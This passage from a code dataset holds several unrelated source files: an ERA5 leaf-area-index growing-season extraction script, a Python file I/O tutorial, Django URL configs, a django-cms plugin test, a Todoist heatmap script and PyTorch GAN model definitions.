we can estimate percent complete\nngrid = 0\nfor xlat in range(lai_low_era5.lat.size):\n for ylon in range(lai_low_era5.lon.size):\n \n if not np.isnan(sacksStart[xlat, ylon]):\n curStart = datetime.datetime.strptime('2020%d'%(round(sacksStart[xlat, ylon])+1), '%Y%j').date().month\n sacksStart[xlat, ylon] = curStart-1\n \n if not np.isnan(sacksEnd[xlat, ylon]):\n curEnd = datetime.datetime.strptime('2020%d'%(round(sacksEnd[xlat, ylon])+1), '%Y%j').date().month\n sacksEnd[xlat, ylon] = curEnd-1\n \n if ~np.isnan(sacksStart[xlat, ylon]) and ~np.isnan(sacksEnd[xlat, ylon]):\n ngrid += 1\n\n\nyearly_grow_lai_low_mean = np.full([lai_low_era5.lat.size, lai_low_era5.lon.size], np.nan)\nyearly_grow_lai_high_mean = np.full([lai_high_era5.lat.size, lai_high_era5.lon.size], np.nan)\n \n \n# THIS LOOPS OVER EVERY GRID CELL OF ERA5 AND EXTRACTS DAILY ERA5 DATA THAT FALLS WITHIN THE SACKS GROWING SEASON\n# latitude loop\nfor xlat in range(lai_low_era5.lat.size):\n # longitude loop\n for ylon in range(lai_low_era5.lon.size):\n\n # if sacks calendar is defined at this grid cell\n if ~np.isnan(sacksStart[xlat, ylon]) and 
~np.isnan(sacksEnd[xlat, ylon]):\n \n # just print out our progress\n if n % 1000 == 0:\n print('%.2f%%'%(n/ngrid*100))\n\n # there are 2 possibilities - that the planting date is before the harvest date in the current year (northern hemisphere), \n # or that the planting date is late in the year and the harvest date is in the beginning of the next year (southern hemisphere)\n # we need to handle these two cases separately\n \n # SOUTHERN HEMISPHERE - NEED 2 YEARS OF ERA5 DATA (this year and last year)\n if sacksStart[xlat, ylon] > sacksEnd[xlat, ylon]:\n\n # start loop on 2nd year to allow for growing season that crosses jan 1\n cur_lai_low1 = lai_low_era5_last_year[orig_var1][int(sacksStart[xlat, ylon]):, xlat, ylon]\n cur_lai_low2 = lai_low_era5[orig_var1][:int(sacksEnd[xlat, ylon]), xlat, ylon]\n \n cur_lai_high1 = lai_high_era5_last_year[orig_var2][int(sacksStart[xlat, ylon]):, xlat, ylon]\n cur_lai_high2 = lai_high_era5[orig_var2][:int(sacksEnd[xlat, ylon]), xlat, ylon]\n\n cur_lai_low = np.concatenate([cur_lai_low1, cur_lai_low2]) * era5_low_veg.cvl.values[xlat, ylon]\n cur_lai_high = np.concatenate([cur_lai_high1, cur_lai_high2]) * era5_high_veg.cvh.values[xlat, ylon]\n\n if len(cur_lai_low) > 0 and len(cur_lai_high) > 0:\n yearly_grow_lai_low_mean[xlat, ylon] = np.nanmean(cur_lai_low)\n yearly_grow_lai_high_mean[xlat, ylon] = np.nanmean(cur_lai_high)\n n += 1\n \n\n # NORTHERN HEMISPHERE - SIMPLER, JUST NEED 1 YEAR OF ERA5\n else:\n cur_lai_low = lai_low_era5[orig_var1][int(sacksStart[xlat, ylon]):int(sacksEnd[xlat, ylon]), xlat, ylon]\n cur_lai_high = lai_high_era5[orig_var2][int(sacksStart[xlat, ylon]):int(sacksEnd[xlat, ylon]), xlat, ylon]\n \n if len(cur_lai_low) > 0 and len(cur_lai_high) > 0:\n yearly_grow_lai_low_mean[xlat, ylon] = np.nanmean(cur_lai_low) * era5_low_veg.cvl.values[xlat, ylon]\n yearly_grow_lai_high_mean[xlat, ylon] = np.nanmean(cur_lai_high) * era5_high_veg.cvh.values[xlat, ylon]\n \n n += 1\n\nprint('renaming dims...')\n\n# SAVE THE EXTRACTED TEMP DATA\nda_grow_lai_mean = xr.DataArray(data = yearly_grow_lai_low_mean + yearly_grow_lai_high_mean, \n dims = ['lat', 'lon'],\n coords = {'time': year, 'lat':lai_low_era5.lat, 'lon':lai_low_era5.lon},\n attrs = {'units' : 'LAI'\n })\nds_grow_lai_mean = xr.Dataset()\nds_grow_lai_mean['lai_grow_mean'] = da_grow_lai_mean\n\nprint('saving netcdf...')\nds_grow_lai_mean.to_netcdf('era5/growing_season/era5_%s_lai_grow_mean_global_%d_fixed_sh.nc'%(crop, year))\n\n\n\nda_grow_lai_low = xr.DataArray(data = yearly_grow_lai_low_mean, \n dims = ['lat', 'lon'],\n coords = {'time': year, 'lat':lai_low_era5.lat, 'lon':lai_low_era5.lon},\n attrs = {'units' : 'LAI'\n })\nds_grow_lai_low = xr.Dataset()\nds_grow_lai_low['lai_grow_mean'] = da_grow_lai_low\n\nprint('saving netcdf...')\nds_grow_lai_low.to_netcdf('era5/growing_season/era5_%s_lai_low_grow_mean_global_%d_fixed_sh.nc'%(crop, year))\n\n\n\n\nda_grow_lai_high = xr.DataArray(data = yearly_grow_lai_high_mean, \n dims = ['lat', 'lon'],\n coords = {'time': year, 'lat':lai_high_era5.lat, 'lon':lai_high_era5.lon},\n attrs = {'units' : 'LAI'\n })\nds_grow_lai_high = xr.Dataset()\nds_grow_lai_high['lai_grow_mean'] = da_grow_lai_high\n\nprint('saving netcdf...')\nds_grow_lai_high.to_netcdf('era5/growing_season/era5_%s_lai_high_grow_mean_global_%d_fixed_sh.nc'%(crop, 
year))\n","repo_name":"ecoffel/2020-ag-cmip6","sub_path":"ag6_extract_era5_grow_lai.py","file_name":"ag6_extract_era5_grow_lai.py","file_ext":"py","file_size_in_byte":10661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"4677205056","text":"# 对文本数据进行读写操作,但不同的文本,有不同的编码\n# open()配合rt模块\nwith open(\"myFile.txt\", encoding='utf-8') as f:\n date=f.read()\n print(date)\n\nwith open('myFile.txt', 'rt', encoding='utf-8') as f:\n for line in f:\n print(line)\n\n# 写入操作 wt 模块 会清除原先的文本,并写入\n\n\n# 文件结尾追加内容 at模块\nwith open('myFile.txt', 'at', encoding='utf-8') as f:\n f.write('//////')\n print(f)\n\n# with会为使用的文件创建一个上下文环境,当程序离开这个with语句块时,文件会自动关闭\n\n#关于换行符 unix和windows是不相同的,\\n \\r\\n python默认是通用换行符\\n 如果不想换行 可以主动通过newline参数声明换行符","repo_name":"loser188/python_text","sub_path":"python/RHP/pythoncodebook/file&IO/读写文本数据51.py","file_name":"读写文本数据51.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"55505352","text":"\"\"\"config URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/4.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom api.views import home\nfrom employee.views import login, loginpage, logoutuser\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('api/', include(\"api.urls\")),\n path('', home, name='home'),\n path('addproduct/', include(\"manifactured_product.urls\")),\n\n path('addclients/', include(\"client.urls\")),\n\n #path('login/', login, name='login'),\n path('loginpage/', loginpage, name='loginpage'), \n path('logoutuser/', logoutuser, name='logoutuser'), \n \n #path('loginuser/', include(\"employee.urls\")),\n #path('logout/', include(\"employee.urls\")),\n \n path('order/', include(\"order.urls\")),\n]\n","repo_name":"Tolq1n/Qualification-work","sub_path":"config/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"29831279305","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom bs4 import BeautifulSoup\nfrom django.conf import settings\nfrom django.contrib import admin\nfrom django.test import override_settings\nfrom cms.api import add_plugin, create_page\nfrom cms.utils.plugins import build_plugin_tree\nfrom cmsplugin_cascade.bootstrap3.container import (BootstrapContainerPlugin, BootstrapRowPlugin,\n BootstrapColumnPlugin)\nfrom cmsplugin_cascade.bootstrap3.accordion import (BootstrapAccordionPlugin,\n BootstrapAccordionPanelPlugin)\nfrom cmsplugin_cascade.bootstrap3 import settings\nfrom cms.test_utils.testcases import CMSTestCase\nfrom .utils import get_request_context\n\nBS3_BREAKPOINT_KEYS = list(tp[0] for tp in settings.CMSPLUGIN_CASCADE['bootstrap3']['breakpoints'])\n\n\nclass AccordionPluginTest(CMSTestCase):\n def setUp(self):\n page = create_page('HOME', 'testing.html', 
'en', published=True, in_navigation=True)\n self.placeholder = page.placeholders.get(slot='Main Content')\n self.request = self.get_request(language='en', page=page)\n self.admin_site = admin.sites.AdminSite()\n\n def build_accordion_plugins(self):\n # create container\n container_model = add_plugin(self.placeholder, BootstrapContainerPlugin, 'en',\n glossary={'breakpoints': BS3_BREAKPOINT_KEYS})\n container_plugin = container_model.get_plugin_class_instance(self.admin_site)\n self.assertIsInstance(container_plugin, BootstrapContainerPlugin)\n\n # add one row\n row_model = add_plugin(self.placeholder, BootstrapRowPlugin, 'en', target=container_model,\n glossary={})\n row_plugin = row_model.get_plugin_class_instance()\n self.assertIsInstance(row_plugin, BootstrapRowPlugin)\n\n # add one column\n column_model = add_plugin(self.placeholder, BootstrapColumnPlugin, 'en', target=row_model,\n glossary={'xs-column-width': 'col-xs-12', 'sm-column-width': 'col-sm-6',\n 'md-column-width': 'col-md-4', 'lg-column-width': 'col-lg-3'})\n column_plugin = column_model.get_plugin_class_instance()\n self.assertIsInstance(column_plugin, BootstrapColumnPlugin)\n\n # add accordion plugin\n accordion_model = add_plugin(self.placeholder, BootstrapAccordionPlugin, 'en', target=column_model)\n accordion_plugin = accordion_model.get_plugin_class_instance(self.admin_site)\n self.assertIsInstance(accordion_plugin, BootstrapAccordionPlugin)\n accordion_plugin.cms_plugin_instance = accordion_model.cmsplugin_ptr\n\n # add accordion panel\n panel_model = add_plugin(self.placeholder, BootstrapAccordionPanelPlugin, 'en',\n target=accordion_model, glossary={'panel_type': \"panel-danger\", 'panel_title': \"Foo\"})\n panel_plugin = panel_model.get_plugin_class_instance(self.admin_site)\n self.assertIsInstance(panel_plugin, BootstrapAccordionPanelPlugin)\n panel_plugin.cms_plugin_instance = panel_model.cmsplugin_ptr\n\n # render the plugins\n plugin_list = [container_model, row_model, column_model, accordion_model, panel_model]\n build_plugin_tree(plugin_list)\n context = get_request_context(self.request)\n\n self.assertEqual(accordion_plugin.get_identifier(accordion_model), 'with 1 panel')\n self.assertEqual(panel_plugin.get_identifier(panel_model), 'Foo')\n\n return container_model.render_plugin(context)\n\n @override_settings()\n def test_bootstrap_accordion(self):\n try:\n del settings.CMSPLUGIN_CASCADE['bootstrap3']['template_basedir']\n except KeyError:\n pass\n html = self.build_accordion_plugins()\n #print html\n soup = BeautifulSoup(html)\n panel_group = soup.find('div', class_='panel-group')\n self.assertIsNotNone(panel_group)\n\n @override_settings()\n def test_angular_bootstrap_accordion(self):\n settings.CMSPLUGIN_CASCADE['bootstrap3'].update({'template_basedir': 'angular-ui'})\n html = self.build_accordion_plugins()\n #print html\n soup = BeautifulSoup(html)\n accordion = soup.find('accordion')\n self.assertIsNotNone(accordion)\n","repo_name":"ReyhanehA/GDP32","sub_path":"79009_test_accordion.py_C__Users_user_Desktop_data_2_data_google_data_jrief_djangocms-cascade_tests.py","file_name":"79009_test_accordion.py_C__Users_user_Desktop_data_2_data_google_data_jrief_djangocms-cascade_tests.py","file_ext":"py","file_size_in_byte":4211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"21300277863","text":"from dataclasses import dataclass\nfrom typing import Callable, cast\n\nfrom app.domain.shared.gateway import HoumerDbGateway, PlaceDbGateway\nfrom 
app.domain.stop.gateway import StopDbGateway\nfrom app.domain.visit.gateway import VisitDbGateway\nfrom app.adapters.database.repositories import houmer_repository, place_repository, visit_repository, stop_repository\n\n\n@dataclass(frozen=True)\nclass Dependencies:\n houmer_db_gateway: HoumerDbGateway\n place_db_gateway: PlaceDbGateway\n visit_db_gateway: VisitDbGateway\n stop_db_gateway: StopDbGateway\n\n\ndef _build_dependencies() -> Callable[[], Dependencies]:\n deps = Dependencies(\n houmer_db_gateway=cast(HoumerDbGateway, houmer_repository),\n place_db_gateway=cast(PlaceDbGateway, place_repository),\n visit_db_gateway=cast(VisitDbGateway, visit_repository),\n stop_db_gateway=cast(StopDbGateway, stop_repository),\n )\n\n def fn() -> Dependencies:\n return deps\n\n return fn\n\n\nget_dependencies = _build_dependencies()\n","repo_name":"yerko76/houmer-tracking-app","sub_path":"app/config/container.py","file_name":"container.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"24057546826","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path(\"\", views.index), \n path(\"process_form\", views.process_form, name='process_form'),\n path('task_status/', views.task_status, name='task_status'),\n path('response/', views.view_response, name='response'),\n path('about/', views.about, name = \"about\"),\n path('response/error', views.error, name=\"error\"),\n path('response/generate-pdf/', views.generate_pdf, name='generate_pdf')\n]","repo_name":"mw74/csc394_group","sub_path":"home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"69929831989","text":"from argparse import ArgumentParser, Action\nimport json\nimport numpy as np\nfrom datetime import date\nfrom math import ceil\n\nfrom contributist.connect import TodoistConnect\nfrom contributist.viz import plt_heatmap\n\nclass LoadConfig(Action):\n def __call__(self, parser, namespace, values, option_string=None):\n with open(values[0], 'r', encoding='utf-8') as fp:\n cfg = json.load(fp)\n for k, v in cfg.items():\n setattr(namespace, k, v)\n\n\nWEEKDAYS = ['Monday', 'Tuesday', 'Wednesday',\n 'Thursday', 'Friday', 'Saturday', 'Sunday']\n\nparser = ArgumentParser()\nparser.add_argument('--config', '-c', action=LoadConfig, nargs=1, required=True)\nparser.add_argument('--days', '-d', type=int, nargs='?', default=28)\nargs = parser.parse_args()\n\nconnection = TodoistConnect(args.token, args.weight_tags, args.default_weight)\nconnection.connect()\n\nweights = connection[:args.days]\ntoday = date.today()\nweekday = today.weekday()\n_, isoweek, _ = today.isocalendar()\nweeks = list(range(ceil((args.days + weekday) / len(WEEKDAYS))))\n\n\ndef week_slice(week):\n start = week * len(WEEKDAYS) - weekday\n return slice(max(0, start), start + 7)\n\n\nheat_matrix = [weights[week_slice(week)] for week in weeks]\n# Front-pad missing days as zero for first week\nheat_matrix[0] = [0] * weekday + heat_matrix[0]\n# Tail-pad missing days as zero for last week\nheat_matrix[-1] = heat_matrix[-1] + [0] * \\\n max(0, len(WEEKDAYS) - len(heat_matrix[-1]))\n\nplt_heatmap(np.array(heat_matrix),\n list(map(lambda d: d[:2], WEEKDAYS)), # only show first two letters\n list(map(lambda w: w + isoweek, weeks))) # display week number on y 
axis\n","repo_name":"felixlinker/contributist","sub_path":"contributist/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"42183452645","text":"import torch\nimport os\nimport math\nimport torch.nn as nn\nfrom torch.nn import init\nimport functools\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nimport numpy as np\nfrom torch.utils.serialization import load_lua\nfrom lib.nn import SynchronizedBatchNorm2d as SynBN2d\n\n\n###############################################################################\n# Functions\n###############################################################################\n\ndef pad_tensor(input):\n height_org, width_org = input.shape[2], input.shape[3]\n divide = 16\n\n if width_org % divide != 0 or height_org % divide != 0:\n\n width_res = width_org % divide\n height_res = height_org % divide\n if width_res != 0:\n width_div = divide - width_res\n pad_left = int(width_div / 2)\n pad_right = int(width_div - pad_left)\n else:\n pad_left = 0\n pad_right = 0\n\n if height_res != 0:\n height_div = divide - height_res\n pad_top = int(height_div / 2)\n pad_bottom = int(height_div - pad_top)\n else:\n pad_top = 0\n pad_bottom = 0\n\n padding = nn.ReflectionPad2d((pad_left, pad_right, pad_top, pad_bottom))\n input = padding(input)\n else:\n pad_left = 0\n pad_right = 0\n pad_top = 0\n pad_bottom = 0\n\n height, width = input.data.shape[2], input.data.shape[3]\n assert width % divide == 0, 'width cant divided by stride'\n assert height % divide == 0, 'height cant divided by stride'\n\n return input, pad_left, pad_right, pad_top, pad_bottom\n\n\ndef pad_tensor_back(input, pad_left, pad_right, pad_top, pad_bottom):\n height, width = input.shape[2], input.shape[3]\n return input[:, :, pad_top: height - pad_bottom, pad_left: width - pad_right]\n\n\ndef weights_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n m.weight.data.normal_(0.0, 0.02)\n elif classname.find('BatchNorm2d') != -1:\n m.weight.data.normal_(1.0, 0.02)\n m.bias.data.fill_(0)\n\n\ndef get_norm_layer(norm_type='instance'):\n if norm_type == 'batch':\n norm_layer = functools.partial(nn.BatchNorm2d, affine=True)\n elif norm_type == 'instance':\n norm_layer = functools.partial(nn.InstanceNorm2d, affine=False)\n elif norm_type == 'synBN':\n norm_layer = functools.partial(SynBN2d, affine=True)\n else:\n raise NotImplementedError('normalization layer [%s] is not found' % norm)\n return norm_layer\n\n\ndef define_network(which_model_netG,gpu_ids=[]):\n net = None\n use_gpu = len(gpu_ids) > 0\n\n if use_gpu:\n assert (torch.cuda.is_available())\n\n if which_model_netG == 'CSDNet_UPE' or which_model_netG == 'CSDNet_LOL':\n from .CSDNet import CSDNet\n net = CSDNet()\n elif which_model_netG == 'LiteCSDNet_UPE' or which_model_netG == 'LiteCSDNet_LOL':\n from .LiteCSDNet import LiteCSDNet\n net = LiteCSDNet()\n elif which_model_netG == 'SLiteCSDNet_UPE' or which_model_netG == 'SLiteCSDNet_LOL':\n from .SLiteCSDNet import SLiteCSDNet\n net = SLiteCSDNet()\n elif which_model_netG == 'CSDGAN':\n from .CSDGAN import CSDGAN\n net = CSDGAN()\n else:\n raise NotImplementedError('The model of the network [%s] is not recognized' % which_model_netG)\n if len(gpu_ids) > 0:\n net.cuda(device=gpu_ids[0])\n net = torch.nn.DataParallel(net, gpu_ids)\n net.apply(weights_init)\n return net\n\n\ndef define_D(input_nc, ndf, which_model_netD,\n n_layers_D=3, 
norm='batch', use_sigmoid=False, gpu_ids=[], patch=False):\n netD = None\n use_gpu = len(gpu_ids) > 0\n norm_layer = get_norm_layer(norm_type=norm)\n\n if use_gpu:\n assert (torch.cuda.is_available())\n if which_model_netD == 'basic':\n netD = NLayerDiscriminator(input_nc, ndf, n_layers=3, norm_layer=norm_layer, use_sigmoid=use_sigmoid,\n gpu_ids=gpu_ids)\n elif which_model_netD == 'n_layers':\n netD = NLayerDiscriminator(input_nc, ndf, n_layers_D, norm_layer=norm_layer, use_sigmoid=use_sigmoid,\n gpu_ids=gpu_ids)\n elif which_model_netD == 'no_norm':\n netD = NoNormDiscriminator(input_nc, ndf, n_layers_D, use_sigmoid=use_sigmoid, gpu_ids=gpu_ids)\n elif which_model_netD == 'no_norm_4':\n netD = NoNormDiscriminator(input_nc, ndf, n_layers_D, use_sigmoid=use_sigmoid, gpu_ids=gpu_ids)\n elif which_model_netD == 'no_patchgan':\n netD = FCDiscriminator(input_nc, ndf, n_layers_D, use_sigmoid=use_sigmoid, gpu_ids=gpu_ids, patch=patch)\n elif which_model_netD == 'attention_D':\n netD = NoNormAttentionDiscriminator(input_nc, ndf, n_layers_D, use_sigmoid=use_sigmoid, gpu_ids=gpu_ids)\n else:\n raise NotImplementedError('Discriminator model name [%s] is not recognized' %\n which_model_netD)\n if use_gpu:\n netD.cuda(device=gpu_ids[0])\n netD = torch.nn.DataParallel(netD, gpu_ids)\n netD.apply(weights_init)\n return netD\n\n\ndef print_network(net):\n num_params = 0\n for param in net.parameters():\n num_params += param.numel()\n print(net)\n print('Total number of parameters: %d' % num_params)\n\n\n##############################################################################\n# Classes\n##############################################################################\n\n\n# Defines the GAN loss which uses either LSGAN or the regular GAN.\n# When LSGAN is used, it is basically same as MSELoss,\n# but it abstracts away the need to create the target label tensor\n# that has the same size as the input\nclass GANLoss(nn.Module):\n def __init__(self, use_lsgan=True, target_real_label=1.0, target_fake_label=0.0,\n tensor=torch.FloatTensor):\n super(GANLoss, self).__init__()\n self.real_label = target_real_label\n self.fake_label = target_fake_label\n self.real_label_var = None\n self.fake_label_var = None\n self.Tensor = tensor\n if use_lsgan:\n self.loss = nn.MSELoss()\n else:\n self.loss = nn.BCELoss()\n\n def get_target_tensor(self, input, target_is_real):\n target_tensor = None\n if target_is_real:\n create_label = ((self.real_label_var is None) or\n (self.real_label_var.numel() != input.numel()))\n if create_label:\n real_tensor = self.Tensor(input.size()).fill_(self.real_label)\n self.real_label_var = Variable(real_tensor, requires_grad=False)\n target_tensor = self.real_label_var\n else:\n create_label = ((self.fake_label_var is None) or\n (self.fake_label_var.numel() != input.numel()))\n if create_label:\n fake_tensor = self.Tensor(input.size()).fill_(self.fake_label)\n self.fake_label_var = Variable(fake_tensor, requires_grad=False)\n target_tensor = self.fake_label_var\n return target_tensor\n\n def __call__(self, input, target_is_real):\n target_tensor = self.get_target_tensor(input, target_is_real)\n return self.loss(input, target_tensor)\n\n\nclass DiscLossWGANGP():\n def __init__(self):\n self.LAMBDA = 10\n\n def name(self):\n return 'DiscLossWGAN-GP'\n\n def initialize(self, opt, tensor):\n # DiscLossLS.initialize(self, opt, tensor)\n self.LAMBDA = 10\n\n # def get_g_loss(self, net, realA, fakeB):\n # # First, G(A) should fake the discriminator\n # self.D_fake = net.forward(fakeB)\n # return 
-self.D_fake.mean()\n\n def calc_gradient_penalty(self, netD, real_data, fake_data):\n alpha = torch.rand(1, 1)\n alpha = alpha.expand(real_data.size())\n alpha = alpha.cuda()\n\n interpolates = alpha * real_data + ((1 - alpha) * fake_data)\n\n interpolates = interpolates.cuda()\n interpolates = Variable(interpolates, requires_grad=True)\n\n disc_interpolates = netD.forward(interpolates)\n\n gradients = torch.autograd.grad(outputs=disc_interpolates, inputs=interpolates,\n grad_outputs=torch.ones(disc_interpolates.size()).cuda(),\n create_graph=True, retain_graph=True, only_inputs=True)[0]\n\n gradient_penalty = ((gradients.norm(2, dim=1) - 1) ** 2).mean() * self.LAMBDA\n return gradient_penalty\n\n\n# Defines the generator that consists of Resnet blocks between a few\n# downsampling/upsampling operations.\n# Code and idea originally from Justin Johnson's architecture.\n# https://github.com/jcjohnson/fast-neural-style/\nclass ResnetGenerator(nn.Module):\n def __init__(self, input_nc, output_nc, ngf=64, norm_layer=nn.BatchNorm2d, use_dropout=False, n_blocks=6,\n gpu_ids=[], padding_type='reflect'):\n assert (n_blocks >= 0)\n super(ResnetGenerator, self).__init__()\n self.input_nc = input_nc\n self.output_nc = output_nc\n self.ngf = ngf\n self.gpu_ids = gpu_ids\n\n model = [nn.ReflectionPad2d(3),\n nn.Conv2d(input_nc, ngf, kernel_size=7, padding=0),\n norm_layer(ngf),\n nn.ReLU(True)]\n\n n_downsampling = 2\n for i in range(n_downsampling):\n mult = 2 ** i\n model += [nn.Conv2d(ngf * mult, ngf * mult * 2, kernel_size=3,\n stride=2, padding=1),\n norm_layer(ngf * mult * 2),\n nn.ReLU(True)]\n\n mult = 2 ** n_downsampling\n for i in range(n_blocks):\n model += [\n ResnetBlock(ngf * mult, padding_type=padding_type, norm_layer=norm_layer, use_dropout=use_dropout)]\n\n for i in range(n_downsampling):\n mult = 2 ** (n_downsampling - i)\n model += [nn.ConvTranspose2d(ngf * mult, int(ngf * mult / 2),\n kernel_size=3, stride=2,\n padding=1, output_padding=1),\n norm_layer(int(ngf * mult / 2)),\n nn.ReLU(True)]\n model += [nn.ReflectionPad2d(3)]\n model += [nn.Conv2d(ngf, output_nc, kernel_size=7, padding=0)]\n model += [nn.Tanh()]\n\n self.model = nn.Sequential(*model)\n\n def forward(self, input):\n if self.gpu_ids and isinstance(input.data, torch.cuda.FloatTensor):\n return nn.parallel.data_parallel(self.model, input, self.gpu_ids)\n else:\n return self.model(input)\n\n\n# Define a resnet block\nclass ResnetBlock(nn.Module):\n def __init__(self, dim, padding_type, norm_layer, use_dropout):\n super(ResnetBlock, self).__init__()\n self.conv_block = self.build_conv_block(dim, padding_type, norm_layer, use_dropout)\n\n def build_conv_block(self, dim, padding_type, norm_layer, use_dropout):\n conv_block = []\n p = 0\n if padding_type == 'reflect':\n conv_block += [nn.ReflectionPad2d(1)]\n elif padding_type == 'replicate':\n conv_block += [nn.ReplicationPad2d(1)]\n elif padding_type == 'zero':\n p = 1\n else:\n raise NotImplementedError('padding [%s] is not implemented' % padding_type)\n\n conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=p),\n norm_layer(dim),\n nn.ReLU(True)]\n if use_dropout:\n conv_block += [nn.Dropout(0.5)]\n\n p = 0\n if padding_type == 'reflect':\n conv_block += [nn.ReflectionPad2d(1)]\n elif padding_type == 'replicate':\n conv_block += [nn.ReplicationPad2d(1)]\n elif padding_type == 'zero':\n p = 1\n else:\n raise NotImplementedError('padding [%s] is not implemented' % padding_type)\n conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=p),\n norm_layer(dim)]\n\n 
return nn.Sequential(*conv_block)\n\n def forward(self, x):\n out = x + self.conv_block(x)\n return out\n\n\n# Defines the Unet generator.\n# |num_downs|: number of downsamplings in UNet. For example,\n# if |num_downs| == 7, image of size 128x128 will become of size 1x1\n# at the bottleneck\nclass UnetGenerator(nn.Module):\n def __init__(self, input_nc, output_nc, num_downs, ngf=64,\n norm_layer=nn.BatchNorm2d, use_dropout=False, gpu_ids=[], skip=False, opt=None):\n super(UnetGenerator, self).__init__()\n self.gpu_ids = gpu_ids\n self.opt = opt\n # currently support only input_nc == output_nc\n assert (input_nc == output_nc)\n\n # construct unet structure\n unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, norm_layer=norm_layer, innermost=True, opt=opt)\n for i in range(num_downs - 5):\n unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, unet_block, norm_layer=norm_layer,\n use_dropout=use_dropout, opt=opt)\n unet_block = UnetSkipConnectionBlock(ngf * 4, ngf * 8, unet_block, norm_layer=norm_layer, opt=opt)\n unet_block = UnetSkipConnectionBlock(ngf * 2, ngf * 4, unet_block, norm_layer=norm_layer, opt=opt)\n unet_block = UnetSkipConnectionBlock(ngf, ngf * 2, unet_block, norm_layer=norm_layer, opt=opt)\n unet_block = UnetSkipConnectionBlock(output_nc, ngf, unet_block, outermost=True, norm_layer=norm_layer, opt=opt)\n\n if skip == True:\n skipmodule = SkipModule(unet_block, opt)\n self.model = skipmodule\n else:\n self.model = unet_block\n\n def forward(self, input):\n if self.gpu_ids and isinstance(input.data, torch.cuda.FloatTensor):\n return nn.parallel.data_parallel(self.model, input, self.gpu_ids)\n else:\n return self.model(input)\n\n\nclass SkipModule(nn.Module):\n def __init__(self, submodule, opt):\n super(SkipModule, self).__init__()\n self.submodule = submodule\n self.opt = opt\n\n def forward(self, x):\n latent = self.submodule(x)\n return self.opt.skip * x + latent, latent\n\n\n# Defines the submodule with skip connection.\n# X -------------------identity---------------------- X\n# |-- downsampling -- |submodule| -- upsampling --|\nclass UnetSkipConnectionBlock(nn.Module):\n def __init__(self, outer_nc, inner_nc,\n submodule=None, outermost=False, innermost=False, norm_layer=nn.BatchNorm2d, use_dropout=False,\n opt=None):\n super(UnetSkipConnectionBlock, self).__init__()\n self.outermost = outermost\n\n downconv = nn.Conv2d(outer_nc, inner_nc, kernel_size=4,\n stride=2, padding=1)\n downrelu = nn.LeakyReLU(0.2, True)\n downnorm = norm_layer(inner_nc)\n uprelu = nn.ReLU(True)\n upnorm = norm_layer(outer_nc)\n\n if opt.use_norm == 0:\n if outermost:\n upconv = nn.ConvTranspose2d(inner_nc * 2, outer_nc,\n kernel_size=4, stride=2,\n padding=1)\n down = [downconv]\n up = [uprelu, upconv, nn.Tanh()]\n model = down + [submodule] + up\n elif innermost:\n upconv = nn.ConvTranspose2d(inner_nc, outer_nc,\n kernel_size=4, stride=2,\n padding=1)\n down = [downrelu, downconv]\n up = [uprelu, upconv]\n model = down + up\n else:\n upconv = nn.ConvTranspose2d(inner_nc * 2, outer_nc,\n kernel_size=4, stride=2,\n padding=1)\n down = [downrelu, downconv]\n up = [uprelu, upconv]\n\n if use_dropout:\n model = down + [submodule] + up + [nn.Dropout(0.5)]\n else:\n model = down + [submodule] + up\n else:\n if outermost:\n upconv = nn.ConvTranspose2d(inner_nc * 2, outer_nc,\n kernel_size=4, stride=2,\n padding=1)\n down = [downconv]\n up = [uprelu, upconv, nn.Tanh()]\n model = down + [submodule] + up\n elif innermost:\n upconv = nn.ConvTranspose2d(inner_nc, outer_nc,\n kernel_size=4, stride=2,\n 
